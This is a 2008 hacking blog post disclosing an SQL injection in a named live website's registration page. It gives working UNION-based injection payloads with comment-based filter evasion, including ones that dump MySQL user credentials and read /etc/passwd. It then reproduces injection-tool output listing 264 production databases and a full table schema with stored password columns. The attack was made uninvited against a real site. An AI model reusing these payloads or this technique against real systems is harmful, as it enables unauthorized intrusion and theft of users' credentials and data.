viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Monday, November 24, 2008

[SQLi] http://www.grouply.com

5:53 PM Posted by viperfx07 No comments
Intro: it's like the http://www.faniq.com case, i'm tired being invited to join some sites that are not even useful for me :) I decided to check, and again, voila, it's vulnerable :)

PoC: http://www.grouply.com/register.php?rem=[SQLi]
Demo: http://www.grouply.com/register.php?rem=25271879'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,3/*

Database info:
[+] URL:http://www.grouply.com/register.php?rem=25271879'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,sqli,3/*
[+] Evasion Used: "/**/" "/*"
[+] 17:42:27
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: prod_collective
User: bg@web1.grouply.com
Version: 5.0.45-log

[+] Do we have Access to MySQL Database: Yes <-- w00t w00t
[!] http://www.grouply.com/register.php?rem=25271879'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,concat(user,0x3a,password),3/**/FROM/**/mysql.user/*

[+] Do we have Access to Load_File: Yes <-- w00t w00t
[!] http://www.grouply.com/register.php?rem=25271879'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,load_file(0x2f6574632f706173737764),3/*

[-] [17:42:30]
[-] Total URL Requests 3
[-] Done

[+] URL:http://www.grouply.com/register.php?rem=25271879'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,sqli,3/*
[+] Evasion Used: "/**/" "/*"
[+] 17:42:34
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: prod_collective
User: bg@web1.grouply.com
Version: 5.0.45-log
[+] Showing all databases current user has access too!
[+] Number of Databases: 264

[0]mysql
[1]prod_collective
[2]prod_common
[3]prod_federated
[4]prod_postfix
[5]prod_stats
[6]prod_tmp
[7]prod_user0
[8]prod_user1
[9]prod_user10
[10]prod_user100
[11]prod_user101
[12]prod_user102
[13]prod_user103
[14]prod_user104
[15]prod_user105
[16]prod_user106
[17]prod_user107
[18]prod_user108
[19]prod_user109
[20]prod_user11
[21]prod_user110
[22]prod_user111
[23]prod_user112
[24]prod_user113
[25]prod_user114
[26]prod_user115
[27]prod_user116
[28]prod_user117
[29]prod_user118
[30]prod_user119
[31]prod_user12
[32]prod_user120
[33]prod_user121
[34]prod_user122
[35]prod_user123
[36]prod_user124
[37]prod_user125
[38]prod_user126
[39]prod_user127
[40]prod_user128
[41]prod_user129
[42]prod_user13
[43]prod_user130
[44]prod_user131
[45]prod_user132
[46]prod_user133
[47]prod_user134
[48]prod_user135
[49]prod_user136
[50]prod_user137
[51]prod_user138
[52]prod_user139
[53]prod_user14
[54]prod_user140
[55]prod_user141
[56]prod_user142
[57]prod_user143
[58]prod_user144
[59]prod_user145
[60]prod_user146
[61]prod_user147
[62]prod_user148
[63]prod_user149
[64]prod_user15
[65]prod_user150
[66]prod_user151
[67]prod_user152
[68]prod_user153
[69]prod_user154
[70]prod_user155
[71]prod_user156
[72]prod_user157
[73]prod_user158
[74]prod_user159
[75]prod_user16
[76]prod_user160
[77]prod_user161
[78]prod_user162
[79]prod_user163
[80]prod_user164
[81]prod_user165
[82]prod_user166
[83]prod_user167
[84]prod_user168
[85]prod_user169
[86]prod_user17
[87]prod_user170
[88]prod_user171
[89]prod_user172
[90]prod_user173
[91]prod_user174
[92]prod_user175
[93]prod_user176
[94]prod_user177
[95]prod_user178
[96]prod_user179
[97]prod_user18
[98]prod_user180
[99]prod_user181
[100]prod_user182
[101]prod_user183
[102]prod_user184
[103]prod_user185
[104]prod_user186
[105]prod_user187
[106]prod_user188
[107]prod_user189
[108]prod_user19
[109]prod_user190
[110]prod_user191
[111]prod_user192
[112]prod_user193
[113]prod_user194
[114]prod_user195
[115]prod_user196
[116]prod_user197
[117]prod_user198
[118]prod_user199
[119]prod_user2
[120]prod_user20
[121]prod_user200
[122]prod_user201
[123]prod_user202
[124]prod_user203
[125]prod_user204
[126]prod_user205
[127]prod_user206
[128]prod_user207
[129]prod_user208
[130]prod_user209
[131]prod_user21
[132]prod_user210
[133]prod_user211
[134]prod_user212
[135]prod_user213
[136]prod_user214
[137]prod_user215
[138]prod_user216
[139]prod_user217
[140]prod_user218
[141]prod_user219
[142]prod_user22
[143]prod_user220
[144]prod_user221
[145]prod_user222
[146]prod_user223
[147]prod_user224
[148]prod_user225
[149]prod_user226
[150]prod_user227
[151]prod_user228
[152]prod_user229
[153]prod_user23
[154]prod_user230
[155]prod_user231
[156]prod_user232
[157]prod_user233
[158]prod_user234
[159]prod_user235
[160]prod_user236
[161]prod_user237
[162]prod_user238
[163]prod_user239
[164]prod_user24
[165]prod_user240
[166]prod_user241
[167]prod_user242
[168]prod_user243
[169]prod_user244
[170]prod_user245
[171]prod_user246
[172]prod_user247
[173]prod_user248
[174]prod_user249
[175]prod_user25
[176]prod_user250
[177]prod_user251
[178]prod_user252
[179]prod_user253
[180]prod_user254
[181]prod_user255
[182]prod_user26
[183]prod_user27
[184]prod_user28
[185]prod_user29
[186]prod_user3
[187]prod_user30
[188]prod_user31
[189]prod_user32
[190]prod_user33
[191]prod_user34
[192]prod_user35
[193]prod_user36
[194]prod_user37
[195]prod_user38
[196]prod_user39
[197]prod_user4
[198]prod_user40
[199]prod_user41
[200]prod_user42
[201]prod_user43
[202]prod_user44
[203]prod_user45
[204]prod_user46
[205]prod_user47
[206]prod_user48
[207]prod_user49
[208]prod_user5
[209]prod_user50
[210]prod_user51
[211]prod_user52
[212]prod_user53
[213]prod_user54
[214]prod_user55
[215]prod_user56
[216]prod_user57
[217]prod_user58
[218]prod_user59
[219]prod_user6
[220]prod_user60
[221]prod_user61
[222]prod_user62
[223]prod_user63
[224]prod_user64
[225]prod_user65
[226]prod_user66
[227]prod_user67
[228]prod_user68
[229]prod_user69
[230]prod_user7
[231]prod_user70
[232]prod_user71
[233]prod_user72
[234]prod_user73
[235]prod_user74
[236]prod_user75
[237]prod_user76
[238]prod_user77
[239]prod_user78
[240]prod_user79
[241]prod_user8
[242]prod_user80
[243]prod_user81
[244]prod_user82
[245]prod_user83
[246]prod_user84
[247]prod_user85
[248]prod_user86
[249]prod_user87
[250]prod_user88
[251]prod_user89
[252]prod_user9
[253]prod_user90
[254]prod_user91
[255]prod_user92
[256]prod_user93
[257]prod_user94
[258]prod_user95
[259]prod_user96
[260]prod_user97
[261]prod_user98
[262]prod_user99
[263]test

[-] [17:47:11]
[-] Total URL Requests 266
[-] Done


[+] URL:http://www.grouply.com/register.php?rem=25271879'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,sqli,3/*
[+] Evasion Used: "/**/" "/*"
[+] 17:47:59
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: prod_collective
User: bg@web1.grouply.com
Version: 5.0.45-log
[+] Showing Tables & Columns from database "prod_collective"
[+] Number of Tables: 39

[Database]: prod_collective
[Table: Columns]
[0]g_accesscode: code,enabled,category,comment
[1]g_bookmark: row_id,user_id,message_id,group_id,bookmarked_flg,note,created,last_upd_tm
[2]g_digest_stats: user_id,updated,num_messages_displayed,proc_time_secs,num_groups,highlights_tm,new_msg_query_tm,total_digest_tm
[3]g_download_task_0: row_id,created,last_upd,host,logic_proc_num,group_id,group_name,u1_user_id,u1_username,u1_y_username,u1_y_password1,u1_captcha_tm,u2_user_id,u2_username,u2_y_username,u2_y_password1,u2_captcha_tm,c0_flg,c1_flg,c2_flg,c3_flg,c4_flg,c5_flg,c6_flg,c7_flg,c8_flg,c9_flg,c10_flg,c11_flg,c12_flg,c13_flg,c14_flg,c15_flg,status0,status1,status2,status3,status4,status5,status6,status7,status8,status9,status10,status11,status12,status13,status14,status15
[4]g_download_task_1: row_id,created,last_upd,host,logic_proc_num,group_id,group_name,u1_user_id,u1_username,u1_y_username,u1_y_password1,u1_captcha_tm,u2_user_id,u2_username,u2_y_username,u2_y_password1,u2_captcha_tm,c0_flg,c1_flg,c2_flg,c3_flg,c4_flg,c5_flg,c6_flg,c7_flg,c8_flg,c9_flg,c10_flg,c11_flg,c12_flg,c13_flg,c14_flg,c15_flg,status0,status1,status2,status3,status4,status5,status6,status7,status8,status9,status10,status11,status12,status13,status14,status15
[5]g_download_track: row_id,created,type,group_name,group_id,download_msg_count,status_nc,int_x1,int_x2,int_x3,int_x4,int_x5,char_x1,char_x2,char_x3,char_x4,char_x5
[6]g_downloadmsg_proc: row_id,created,start_tm,host,pid,type,group_name,username,comments
[7]g_email_to_author: row_id,created,recipient,recipient_email,recipient_id,subject,sender_id,template_code,msg_body
[8]g_gap: row_id,group_id,group_name,msg_num,last_upd_tm,priority_nc,detect_tm
[9]g_gap_20080630: row_id,group_id,group_name,msg_num,last_upd_tm,priority_nc,detect_tm
[10]g_gap_backup: row_id,group_id,group_name,msg_num,last_upd_tm,priority_nc,detect_tm
[11]g_gap_backup20080511: row_id,group_id,group_name,msg_num,last_upd_tm,priority_nc,detect_tm
[12]g_gap_backup20080611: row_id,group_id,group_name,msg_num,last_upd_tm,priority_nc,detect_tm
[13]g_gm_dedup: row_id,shard_num,gm_id
[14]g_group_auth: row_id,group_name,group_id,auth_code,auth_tm,lockout_upd_tm
[15]g_group_auth_track: row_id,created,group_auth_id,group_name,ip,desc_text
[16]g_group_c: row_id,name,state,msg_num_d,gap_checked_msg_num,lock_status,archived_resolved_flg,archived_msg_flg,msg_status_tm,lock_status_tm
[17]g_group_member_c: row_id,group_id,user_id,y_profile_flg,group_status_tm,group_status,email_fwd_flg,email_fwd_flg_tm,email,g_email_flg
[18]g_mail: row_id,created,mail_act_id,desc_text,comments,recipient_count,to_email,group_name,f_name,l_name,status,reminder_count,par_mail_id
[19]g_mail_act: row_id,created,user_id,template_id,act_code,user_email,group_count,register_code,mail_trackid,source_page,reminded_flg,ip,comments
[20]g_mail_response: row_id,created,ip,register_code,mail_track_id,action_nc
[21]g_mail_response_invalid: row_id,created,ip,register_code,mail_track_id,action_nc
[22]g_mail_template: row_id,created,last_upd,src_type_cd,custom_flg,status,subject,desc_text,tempting_text,comments,last_upd_by
[23]g_popular_group: row_id,group_id,group_name,rank
[24]g_rating: row_id,created,user_id,group_id,message_id,first_flg,rating,last_upd_tm
[25]g_refresh_q: row_id,created,user_id,host,process_id
[26]g_tag: row_id,created,user_id,group_id,message_id,tag,seq
[27]g_tip: row_id,tip_num,desc_text,created
[28]g_uauthor_obsolete: row_id,uname,status,status_tm,group_name,msg_num
[29]g_unarchive: row_id,created,group_name,group_id,req_tm,status,status_tm,start_tm,end_tm
[30]g_update: row_id,created,user_id,group_id,message_id,update_count,last_upd_tm
[31]g_user_c: row_id,group_sync_status,group_sync_status_tm,captcha_status,captcha_ip,captcha_status_tm,sync_req_tm,lock_status,lock_status_tm,y_password_status,y_password_status_tm,download_last_tm
[32]g_user_c2: row_id,created,ref_user_id
[33]g_user_c3: row_id,created,ref_user_id,login_tm
[34]g_user_delete: row_id,created,username,confirm_email,group_count,del_req_tm,status,status_tm
[35]g_user_stats: user_id,new_user_count,entry_count,new_user_count_7d,new_user_count_30d,new_user_count_all
[36]g_view: row_id,user_id,group_id,message_id,read_flg,view_count,created,last_upd_tm
[37]g_waitinglist: time,email
[38]g_webconn_proc: row_id,created,start_tm,host,pid,logic_proc_num,status,next_new_group_cycle,last_cycle,last_status,last_run_tm,last_duration,last_msg_count,scheduled_groups,finished_groups,ok_groups,noarchive_groups,overlimit_groups,invalidpass_groups,nonenglish_groups,triplenine_groups,captcha_groups,no_user_groups,server_error_groups,other_failed_groups,comments

[-] [17:55:42]
[-] Total URL Requests 393
[-] Done

0 comments:

Post a Comment